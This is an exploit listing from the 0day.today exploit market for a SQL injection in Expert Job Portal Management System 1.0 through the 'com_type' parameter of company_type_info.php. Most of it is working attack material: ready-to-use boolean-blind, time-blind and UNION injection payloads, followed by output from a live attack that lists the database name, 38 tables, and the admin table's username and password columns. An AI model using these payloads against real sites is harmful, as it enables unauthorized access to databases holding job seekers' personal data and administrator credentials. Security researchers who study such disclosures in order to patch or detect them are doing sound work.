[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Expert Job Portal Management System 1.0 SQL Injection Vulnerability

Author
CraCkEr
Risk
[
Security Risk High
]
0day-ID
0day-ID-38769
Category
web applications
Date add
07-06-2023
Platform
php
┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://www.codester.com/items/20720/                                      │
│  Vendor   : Expert IT Solution                                                         │
│  Software : Expert Job Portal Management System 1.0                                    │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
  CryptoJob (Twitter) twitter.com/0x0CryptoJob
     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /company_type_info.php

https://website/company_type_info.php?com_type=Agent


GET parameter 'com_type' is vulnerable to SQL Injection

---
Parameter: com_type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database
current database: 'sagor_****_job'


fetching tables

[38 tables]
+---------------------------------+
| all_country                     |
| city_manage                     |
| company_type                    |
| contact_manage                  |
| content_manage                  |
| division_manage                 |
| enroll_trainning                |
| exp_settings                    |
| job_apply                       |
| job_categories                  |
| job_listing                     |
| job_seeker_carieer_details      |
| job_seeker_education            |
| job_seeker_emp_histo            |
| job_seeker_image                |
| job_seeker_info                 |
| job_seeker_lang_pro             |
| job_seeker_other_relatiive_info |
| job_seeker_pref_details         |
| job_seeker_profess_info         |
| job_seeker_reff                 |
| job_seeker_resume               |
| job_seeker_specialization       |
| job_seeker_training             |
| job_seeker_upload_resume        |
| languages                       |
| package                         |
| pages                           |
| recurator_info                  |
| recurator_verification          |
| save_jobs                       |
| social_manage                   |
| subscribe                       |
| sup_ad_log                      |
| testmonial_manage               |
| timezones                       |
| trainning_category              |
| trainning_manage                |
+---------------------------------+


fetching columns for table 'sup_ad_log'

[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| status     | int(11)      |
| admin_role | int(11)      |
| email      | varchar(100) |
| id         | int(11)      |
| sup_pass   | varchar(100) |
| sup_user   | varchar(100) |
+------------+--------------+


[-] Done

#  0day.today [2024-12-24]  #